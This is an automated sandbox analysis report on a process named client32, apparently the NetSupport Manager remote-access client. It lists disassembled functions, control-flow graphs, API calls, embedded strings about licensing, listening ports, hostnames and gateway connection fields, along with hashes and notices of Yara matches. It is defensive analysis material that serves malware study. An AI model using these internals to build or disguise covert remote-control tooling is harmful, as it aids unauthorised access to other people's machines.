                                                                                                • String ID: *BeepSound$*BeepUsingSpeaker$*ListenPort$*PriorityClass$*ScreenScrape$*StartupDelay$445817$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$IKS.LIC$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$Intel(r)$IsILS returned %d, isvistaservice %d$IsJPIK returned %d, isvistaservice %d$JPK$LSPloaded=%d, WFPloaded=%d$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NeedsReinstall$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TCPIP$TraceIPC$TracePriv$Unsupported Platform$UseIPC$UseLegacyPrintCapture$UseNTSecurity$V12.00.20$V12.10.20$View$Windows 10$Windows 10 x64$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 2016$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                                                                • API String ID: 372548862-3380588243
                                                                                                • Opcode ID: 9e5f71a37083c33384178188806141142b121f6025a23487265c9df25a7219e6
                                                                                                • Instruction ID: 381c96219eccee67eae21d9e39560490d5bedbb063d23e5a2fc42920cd5923e4
                                                                                                • Opcode Fuzzy Hash: 9e5f71a37083c33384178188806141142b121f6025a23487265c9df25a7219e6
                                                                                                • Instruction Fuzzy Hash: 39F2F978E0226A9FE715CBA0CC94FADF7A5BB4870CF504468F925B72C8DB706940CB56
                                                                                                Function 1102E0D0 Relevance: 82.9, APIs: 15, Strings: 32, Instructions: 630COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1182 1102e0d0-1102e120 call 111101b0 1185 1102e122-1102e136 call 11143630 1182->1185 1186 1102e138 1182->1186 1188 1102e13e-1102e183 call 11142e60 call 11143690 1185->1188 1186->1188 1194 1102e323-1102e332 call 11145990 1188->1194 1195 1102e189 1188->1195 1204 1102e338-1102e348 1194->1204 1196 1102e190-1102e193 1195->1196 1198 1102e195-1102e197 1196->1198 1199 1102e1b8-1102e1c1 1196->1199 1201 1102e1a0-1102e1b1 1198->1201 1202 1102e1c7-1102e1ce 1199->1202 1203 1102e2f4-1102e30d call 11143690 1199->1203 1201->1201 1205 1102e1b3 1201->1205 1202->1203 1207 1102e2c3-1102e2d8 call 11163ca7 1202->1207 1208 1102e1d5-1102e1d7 1202->1208 1209 1102e2da-1102e2ef call 11163ca7 1202->1209 1210 1102e26a-1102e29d call 11162777 call 11142e60 1202->1210 1211 1102e2ab-1102e2c1 call 11164ed0 1202->1211 1212 1102e25b-1102e265 1202->1212 1213 1102e29f-1102e2a9 1202->1213 1214 1102e21c-1102e222 1202->1214 1215 1102e24c-1102e256 1202->1215 1203->1196 1232 1102e313-1102e315 1203->1232 1216 1102e34a 1204->1216 1217 1102e34f-1102e363 call 1102d360 1204->1217 1205->1203 1207->1203 1208->1203 1226 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 1208->1226 1209->1203 1210->1203 1211->1203 1212->1203 1213->1203 1218 1102e224-1102e238 call 11163ca7 1214->1218 1219 1102e23d-1102e247 1214->1219 1215->1203 1216->1217 1228 1102e368-1102e36d 1217->1228 1218->1203 1219->1203 1226->1203 1236 1102e413-1102e42d call 11146fe0 1228->1236 1239 1102e373-1102e398 call 110b7df0 call 11147060 1228->1239 1232->1236 1237 1102e31b-1102e321 1232->1237 1249 1102e483-1102e48f call 1102bc40 1236->1249 1250 1102e42f-1102e448 call 1105e820 1236->1250 1237->1194 1237->1204 1258 1102e3a3-1102e3a9 1239->1258 1259 1102e39a-1102e3a1 1239->1259 1261 1102e491-1102e498 1249->1261 1262 1102e468-1102e46f 1249->1262 1250->1249 1265 1102e44a-1102e45c 1250->1265 1263 1102e3ab-1102e3b2 call 11028360 1258->1263 1264 1102e409 1258->1264 1259->1236 1266 1102e475-1102e478 1261->1266 1268 1102e49a-1102e4a4 1261->1268 1262->1266 1267 1102e67a-1102e69b GetComputerNameA 1262->1267 1263->1264 1279 1102e3b4-1102e3e6 1263->1279 1264->1236 1265->1249 1276 1102e45e 1265->1276 1271 1102e47a-1102e481 call 110b7df0 1266->1271 1272 1102e4a9 1266->1272 1273 1102e6d3-1102e6d9 1267->1273 1274 1102e69d-1102e6d1 call 11028230 1267->1274 1268->1267 1278 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 1271->1278 1272->1278 1280 1102e6db-1102e6e0 1273->1280 1281 1102e70f-1102e722 call 11164ed0 1273->1281 1274->1273 1304 1102e727-1102e733 1274->1304 1276->1262 1332 1102e64a-1102e652 SetLastError 1278->1332 1333 1102e58c-1102e5a3 1278->1333 1295 1102e3f0-1102e3ff call 110f64d0 1279->1295 1296 1102e3e8-1102e3ee 1279->1296 1285 1102e6e6-1102e6ea 1280->1285 1300 1102e917-1102e93a 1281->1300 1287 1102e706-1102e708 1285->1287 1288 1102e6ec-1102e6ee 1285->1288 1299 1102e70b-1102e70d 1287->1299 1297 1102e702-1102e704 1288->1297 1298 1102e6f0-1102e6f6 1288->1298 1301 1102e402-1102e404 call 1102d900 1295->1301 1296->1295 1296->1301 1297->1299 1298->1287 1303 1102e6f8-1102e700 1298->1303 1299->1281 1299->1304 1313 1102e962-1102e96a 1300->1313 1314 1102e93c-1102e942 1300->1314 1301->1264 1303->1285 1303->1297 1310 1102e735-1102e74a call 110b7df0 call 1102a1f0 1304->1310 1311 1102e74c-1102e75f call 11081d30 1304->1311 1336 1102e7a3-1102e7bc call 11081d30 1310->1336 1324 1102e761-1102e784 1311->1324 1325 1102e786-1102e788 1311->1325 1317 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 1313->1317 1318 1102e96c-1102e979 call 11036710 call 11162777 1313->1318 1314->1313 1321 1102e944-1102e95d call 1102d900 1314->1321 1318->1317 1321->1313 1324->1336 1330 1102e790-1102e7a1 1325->1330 1330->1330 1330->1336 1339 1102e613-1102e61f 1332->1339 1333->1339 1348 1102e5a5-1102e5ae 1333->1348 1356 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 1336->1356 1357 1102e8fc-1102e909 call 11164ed0 1336->1357 1346 1102e662-1102e671 1339->1346 1347 1102e621-1102e62d 1339->1347 1346->1267 1349 1102e673-1102e674 FreeLibrary 1346->1349 1352 1102e63f-1102e643 1347->1352 1353 1102e62f-1102e63d GetProcAddress 1347->1353 1348->1339 1359 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 1348->1359 1349->1267 1354 1102e654-1102e656 SetLastError 1352->1354 1355 1102e645-1102e648 1352->1355 1353->1352 1361 1102e65c 1354->1361 1355->1361 1394 1102e853-1102e869 call 11129e00 1356->1394 1395 1102e83f-1102e84e call 11029a70 1356->1395 1370 1102e90c-1102e911 CharUpperA 1357->1370 1359->1339 1379 1102e5e8-1102e60e call 11147060 call 11027f80 1359->1379 1361->1346 1370->1300 1379->1339 1399 1102e882-1102e8bc call 110d0e20 * 2 1394->1399 1400 1102e86b-1102e87d call 110d0e20 1394->1400 1395->1394 1407 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 1399->1407 1408 1102e8be-1102e8cd call 11029a70 1399->1408 1400->1399 1407->1370 1408->1407
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _malloc_memsetwsprintf
                                                                                                • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/11/16 11:28:14 V12.10F20$445817$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                • API String ID: 3802068140-1091921282
                                                                                                • Opcode ID: 5d39502fb8738d552d5eb44f35007f7541f7d141e789a8db14d18e146d75462b
                                                                                                • Instruction ID: ec88a390f79512b50aba7168cc31da78705c53b3cca2911266f0d70c00f4e6f9
                                                                                                • Opcode Fuzzy Hash: 5d39502fb8738d552d5eb44f35007f7541f7d141e789a8db14d18e146d75462b
                                                                                                • Instruction Fuzzy Hash: 8232B175D4127A9FDB22CF90CC84BEDB7B8BB44308F8445E9E559A7280EB706E84CB51
                                                                                                Function 69CF3D00 Relevance: 68.6, APIs: 11, Strings: 28, Instructions: 392COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2044 69cf3d00-69cf3d42 call 69d01c50 call 69cf3b80 2048 69cf3d47-69cf3d4f 2044->2048 2049 69cf3d6c-69cf3d6e 2048->2049 2050 69cf3d51-69cf3d6b call 69d028e1 2048->2050 2052 69cf3d87-69cf3da1 call 69ce8fb0 2049->2052 2053 69cf3d70-69cf3d84 call 69ce6f50 2049->2053 2059 69cf3dc5-69cf3e44 call 69ce5e90 * 2 call 69cf7be0 call 69ce5e20 lstrlenA 2052->2059 2060 69cf3da3-69cf3dc4 call 69ce63c0 call 69d028e1 2052->2060 2053->2052 2073 69cf3e98-69cf3fbe call 69ce5500 call 69ce6050 call 69cf7c70 * 2 call 69cf7d00 * 3 call 69ce5060 call 69cf7d00 call 69d01bfd call 69cf7d00 gethostname call 69cf7d00 call 69ceb8e0 2059->2073 2074 69cf3e46-69cf3e95 call 69cfd8b0 call 69ce5060 call 69ce4830 call 69d01bfd 2059->2074 2109 69cf3fc5-69cf3fe1 call 69cf7d00 2073->2109 2110 69cf3fc0 2073->2110 2074->2073 2113 69cf3ff8-69cf3ffe 2109->2113 2114 69cf3fe3-69cf3ff5 call 69cf7d00 2109->2114 2110->2109 2116 69cf421a-69cf4263 call 69cf7b60 call 69d01bfd call 69ce98d0 call 69cf77e0 2113->2116 2117 69cf4004-69cf4022 call 69ce5e20 2113->2117 2114->2113 2145 69cf4265-69cf4291 call 69cea4e0 call 69d028e1 2116->2145 2146 69cf4292-69cf42aa call 69d028e1 2116->2146 2124 69cf405a-69cf4084 call 69ce5e20 2117->2124 2125 69cf4024-69cf4057 call 69ce5060 call 69cf7d00 call 69d01bfd 2117->2125 2134 69cf408a-69cf41ce call 69ce5060 call 69cf7d00 call 69d01bfd call 69ce5e20 call 69ce5060 call 69cf7d00 call 69d01bfd call 69ce5e20 call 69ce5060 call 69cf7d00 call 69d01bfd call 69ce5e20 call 69ce5060 call 69cf7d00 call 69d01bfd 2124->2134 2135 69cf41d1-69cf4217 call 69cf7d00 call 69ce5e20 call 69cf7d00 2124->2135 2125->2124 2134->2135 2135->2116
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memset
                                                                                                • String ID: *Dept$*Gsk$1.1$445817$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                • API String ID: 2102423945-3577143777
                                                                                                • Opcode ID: 89b8c303495c6bb78fbccd0a45cc7f5db6ddf82422dc33ddaaea6efea41dea8e
                                                                                                • Instruction ID: 7b1bb2c9ad3064764f4fdd1ed755b5c51c3f81c3dbbeab9d0e06924da5abe084
                                                                                                • Opcode Fuzzy Hash: 89b8c303495c6bb78fbccd0a45cc7f5db6ddf82422dc33ddaaea6efea41dea8e
                                                                                                • Instruction Fuzzy Hash: 17E1B3B6C0021C6ADB24DB60DC90FEF7378AF55319F8090E9F609A3545EB355B898FA1
                                                                                                Function 11144140 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2185 11144140-11144181 GetModuleFileNameA 2186 111441c3 2185->2186 2187 11144183-11144196 call 11081e00 2185->2187 2188 111441c9-111441cd 2186->2188 2187->2186 2196 11144198-111441c1 LoadLibraryA 2187->2196 2190 111441cf-111441dc LoadLibraryA 2188->2190 2191 111441e9-11144207 GetModuleHandleA GetProcAddress 2188->2191 2190->2191 2193 111441de-111441e6 LoadLibraryA 2190->2193 2194 11144217-11144240 GetProcAddress * 4 2191->2194 2195 11144209-11144215 2191->2195 2193->2191 2197 11144243-111442c3 GetProcAddress * 10 call 11162bb7 2194->2197 2195->2197 2196->2188
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,756F110C), ref: 11144173
                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111441BC
                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 111441D5
                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 111441E4
                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 111441EA
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 111441FE
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114421D
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11144228
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11144233
                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114423E
                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11144249
                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11144254
                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114425F
                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114426A
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11144275
                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11144280
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 1114428B
                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11144296
                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111442A1
                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111442AC
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                                • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                                • API String ID: 3874234733-2061581830
                                                                                                • Opcode ID: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                • Instruction ID: c7cebb5ad097969c59afa36c8b157edb2e0deacaa1fcee2d42955e2ce7c14d1b
                                                                                                • Opcode Fuzzy Hash: 57b4066cb2a569ca058a5d5f8073bc193ef12f36e95607c0665d50404da9b0c4
                                                                                                • Instruction Fuzzy Hash: 74416174A40704AFDB289F769D84E6BFBF8FF55B18B50492EE445D3A00EB74E8008B59
                                                                                                Function 1102E199 Relevance: 49.3, APIs: 7, Strings: 21, Instructions: 319libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 2557 1102e199 2558 1102e1a0-1102e1b1 2557->2558 2558->2558 2559 1102e1b3 2558->2559 2560 1102e2f4-1102e30d call 11143690 2559->2560 2563 1102e313-1102e315 2560->2563 2564 1102e190-1102e193 2560->2564 2567 1102e413-1102e42d call 11146fe0 2563->2567 2568 1102e31b-1102e321 2563->2568 2565 1102e195-1102e197 2564->2565 2566 1102e1b8-1102e1c1 2564->2566 2565->2558 2566->2560 2569 1102e1c7-1102e1ce 2566->2569 2595 1102e483-1102e48f call 1102bc40 2567->2595 2596 1102e42f-1102e448 call 1105e820 2567->2596 2571 1102e323-1102e332 call 11145990 2568->2571 2572 1102e338-1102e348 2568->2572 2569->2560 2573 1102e2c3-1102e2d8 call 11163ca7 2569->2573 2574 1102e1d5-1102e1d7 2569->2574 2575 1102e2da-1102e2ef call 11163ca7 2569->2575 2576 1102e26a-1102e29d call 11162777 call 11142e60 2569->2576 2577 1102e2ab-1102e2c1 call 11164ed0 2569->2577 2578 1102e25b-1102e265 2569->2578 2579 1102e29f-1102e2a9 2569->2579 2580 1102e21c-1102e222 2569->2580 2581 1102e24c-1102e256 2569->2581 2571->2572 2584 1102e34a 2572->2584 2585 1102e34f-1102e36d call 1102d360 2572->2585 2573->2560 2574->2560 2594 1102e1dd-1102e217 call 11162777 call 11142e60 call 1102d360 2574->2594 2575->2560 2576->2560 2577->2560 2578->2560 2579->2560 2586 1102e224-1102e238 call 11163ca7 2580->2586 2587 1102e23d-1102e247 2580->2587 2581->2560 2584->2585 2585->2567 2609 1102e373-1102e398 call 110b7df0 call 11147060 2585->2609 2586->2560 2587->2560 2594->2560 2613 1102e491-1102e498 2595->2613 2614 1102e468-1102e46f 2595->2614 2596->2595 2617 1102e44a-1102e45c 2596->2617 2640 1102e3a3-1102e3a9 2609->2640 2641 1102e39a-1102e3a1 2609->2641 2618 1102e475-1102e478 2613->2618 2620 1102e49a-1102e4a4 2613->2620 2614->2618 2619 1102e67a-1102e69b GetComputerNameA 2614->2619 2617->2595 2631 1102e45e 2617->2631 2624 1102e47a-1102e481 call 110b7df0 2618->2624 2625 1102e4a9 2618->2625 2627 1102e6d3-1102e6d9 2619->2627 2628 1102e69d-1102e6d1 call 11028230 2619->2628 2620->2619 2633 1102e4ac-1102e586 call 11027f40 call 110281e0 call 11027f40 * 2 LoadLibraryA GetProcAddress 2624->2633 2625->2633 2634 1102e6db-1102e6e0 2627->2634 2635 1102e70f-1102e722 call 11164ed0 2627->2635 2628->2627 2661 1102e727-1102e733 2628->2661 2631->2614 2689 1102e64a-1102e652 SetLastError 2633->2689 2690 1102e58c-1102e5a3 2633->2690 2644 1102e6e6-1102e6ea 2634->2644 2655 1102e917-1102e93a 2635->2655 2645 1102e3ab-1102e3b2 call 11028360 2640->2645 2646 1102e409 2640->2646 2641->2567 2649 1102e706-1102e708 2644->2649 2650 1102e6ec-1102e6ee 2644->2650 2645->2646 2666 1102e3b4-1102e3e6 2645->2666 2646->2567 2654 1102e70b-1102e70d 2649->2654 2652 1102e702-1102e704 2650->2652 2653 1102e6f0-1102e6f6 2650->2653 2652->2654 2653->2649 2662 1102e6f8-1102e700 2653->2662 2654->2635 2654->2661 2670 1102e962-1102e96a 2655->2670 2671 1102e93c-1102e942 2655->2671 2664 1102e735-1102e74a call 110b7df0 call 1102a1f0 2661->2664 2665 1102e74c-1102e75f call 11081d30 2661->2665 2662->2644 2662->2652 2697 1102e7a3-1102e7bc call 11081d30 2664->2697 2681 1102e761-1102e784 2665->2681 2682 1102e786-1102e788 2665->2682 2684 1102e3f0-1102e3ff call 110f64d0 2666->2684 2685 1102e3e8-1102e3ee 2666->2685 2673 1102e97c-1102ea08 call 11162777 * 2 call 11147060 * 2 GetCurrentProcessId call 110ee150 call 11028290 call 11147060 call 11162bb7 2670->2673 2674 1102e96c-1102e979 call 11036710 call 11162777 2670->2674 2671->2670 2676 1102e944-1102e95d call 1102d900 2671->2676 2674->2673 2676->2670 2681->2697 2693 1102e790-1102e7a1 2682->2693 2688 1102e402-1102e404 call 1102d900 2684->2688 2685->2684 2685->2688 2688->2646 2699 1102e613-1102e61f 2689->2699 2690->2699 2714 1102e5a5-1102e5ae 2690->2714 2693->2693 2693->2697 2720 1102e7c2-1102e83d call 11147060 call 110cfe80 call 110d16d0 call 110b7df0 wsprintfA call 110b7df0 wsprintfA 2697->2720 2721 1102e8fc-1102e909 call 11164ed0 2697->2721 2709 1102e662-1102e671 2699->2709 2710 1102e621-1102e62d 2699->2710 2709->2619 2711 1102e673-1102e674 FreeLibrary 2709->2711 2715 1102e63f-1102e643 2710->2715 2716 1102e62f-1102e63d GetProcAddress 2710->2716 2711->2619 2714->2699 2719 1102e5b0-1102e5e6 call 11147060 call 1112c1b0 2714->2719 2717 1102e654-1102e656 SetLastError 2715->2717 2718 1102e645-1102e648 2715->2718 2716->2715 2723 1102e65c 2717->2723 2718->2723 2719->2699 2742 1102e5e8-1102e60e call 11147060 call 11027f80 2719->2742 2757 1102e853-1102e869 call 11129e00 2720->2757 2758 1102e83f-1102e84e call 11029a70 2720->2758 2735 1102e90c-1102e911 CharUpperA 2721->2735 2723->2709 2735->2655 2742->2699 2762 1102e882-1102e8bc call 110d0e20 * 2 2757->2762 2763 1102e86b-1102e87d call 110d0e20 2757->2763 2758->2757 2770 1102e8d2-1102e8fa call 11164ed0 call 110d0a10 2762->2770 2771 1102e8be-1102e8cd call 11029a70 2762->2771 2763->2762 2770->2735 2771->2770
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Wtsapi32.dll), ref: 1102E501
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID: $18/11/16 11:28:14 V12.10F20$445817$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$ListenPort$MacAddress$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Wtsapi32.dll$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                • API String ID: 1029625771-2194706773
                                                                                                • Opcode ID: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
                                                                                                • Instruction ID: db6713792a15d7fd58b1be38af693bfb3b21aad0558d55bfb54ca6815a31c46c
                                                                                                • Opcode Fuzzy Hash: 4844477a3dfa00db22a4a3eae4f5fa09477cc507549c10b77b16c479c19a4a69
